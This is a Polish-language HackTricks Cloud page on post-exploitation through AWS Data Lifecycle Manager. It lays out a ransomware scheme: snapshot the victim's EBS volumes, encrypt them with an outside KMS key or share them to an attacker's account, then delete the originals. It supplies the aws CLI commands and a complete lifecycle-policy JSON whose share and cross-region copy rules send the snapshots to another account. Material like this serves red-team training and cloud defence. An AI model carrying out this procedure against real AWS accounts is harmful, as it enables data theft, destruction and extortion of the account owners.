HackTricks CloudAWS - DLM Post Exploitation
Tip
Ucz się & ćwicz AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Ucz się & ćwicz GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Ucz się & ćwicz Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Wspieraj HackTricks
- Sprawdź subscription plans!
- Dołącz do 💬 Discord group lub telegram group lub śledź nas na Twitterze 🐦 @hacktricks_live.
- Podziel się hacking tricks, zgłaszając PRy do HackTricks i HackTricks Cloud github repos.
Data Lifecycle Manger (DLM)
EC2:DescribeVolumes, DLM:CreateLifeCyclePolicy
Atak ransomware można przeprowadzić, szyfrując jak najwięcej EBS volumes, a następnie usuwając bieżące EC2 instances, EBS volumes i snapshots. Aby zautomatyzować tę złośliwą działalność, można wykorzystać Amazon DLM, szyfrując snapshots za pomocą KMS key z innego AWS account i przenosząc zaszyfrowane snapshots do innego konta. Alternatywnie można przenieść snapshots bez szyfrowania na konto kontrolowane przez atakującego i zaszyfrować je tam. Chociaż bezpośrednie zaszyfrowanie istniejących EBS volumes lub snapshots nie jest proste, można to osiągnąć poprzez utworzenie nowego volume lub snapshot.
Po pierwsze, użyje się polecenia do zebrania informacji o wolumenach, takich jak instance ID, volume ID, encryption status, attachment status oraz volume type.
aws ec2 describe-volumes
Po drugie, stworzy się lifecycle policy. To polecenie korzysta z DLM API do skonfigurowania lifecycle policy, która automatycznie wykonuje codzienne snapshots określonych wolumenów o wyznaczonej porze. Zastosuje też określone tags do snapshots oraz skopiuje tags z wolumenów na snapshots. Plik policyDetails.json zawiera szczegóły lifecycle policy, takie jak target tags, schedule, ARN opcjonalnego KMS key do szyfrowania oraz target account do udostępniania snapshots, co zostanie zarejestrowane w logach CloudTrail ofiary.
aws dlm create-lifecycle-policy --description "My first policy" --state ENABLED --execution-role-arn arn:aws:iam::12345678910:role/AWSDataLifecycleManagerDefaultRole --policy-details file://policyDetails.json
Szablon dokumentu polityki można znaleźć tutaj:
{
"PolicyType": "EBS_SNAPSHOT_MANAGEMENT",
"ResourceTypes": [
"VOLUME"
],
"TargetTags": [
{
"Key": "ExampleKey",
"Value": "ExampleValue"
}
],
"Schedules": [
{
"Name": "DailySnapshots",
"CopyTags": true,
"TagsToAdd": [
{
"Key": "SnapshotCreator",
"Value": "DLM"
}
],
"VariableTags": [
{
"Key": "CostCenter",
"Value": "Finance"
}
],
"CreateRule": {
"Interval": 24,
"IntervalUnit": "HOURS",
"Times": [
"03:00"
]
},
"RetainRule": {
"Count": 14
},
"FastRestoreRule": {
"Count": 2,
"Interval": 12,
"IntervalUnit": "HOURS"
},
"CrossRegionCopyRules": [
{
"TargetRegion": "us-west-2",
"Encrypted": true,
"CmkArn": "arn:aws:kms:us-west-2:123456789012:key/your-kms-key-id",
"CopyTags": true,
"RetainRule": {
"Interval": 1,
"IntervalUnit": "DAYS"
}
}
],
"ShareRules": [
{
"TargetAccounts": [
"123456789012"
],
"UnshareInterval": 30,
"UnshareIntervalUnit": "DAYS"
}
]
}
],
"Parameters": {
"ExcludeBootVolume": false
}
}
Tip
Ucz się & ćwicz AWS Hacking:
Ucz się & ćwicz GCP Hacking:
Ucz się & ćwicz Az Hacking:Wspieraj HackTricks
- Sprawdź subscription plans!
- Dołącz do 💬 Discord group lub telegram group lub śledź nas na Twitterze 🐦 @hacktricks_live.
- Podziel się hacking tricks, zgłaszając PRy do HackTricks i HackTricks Cloud github repos.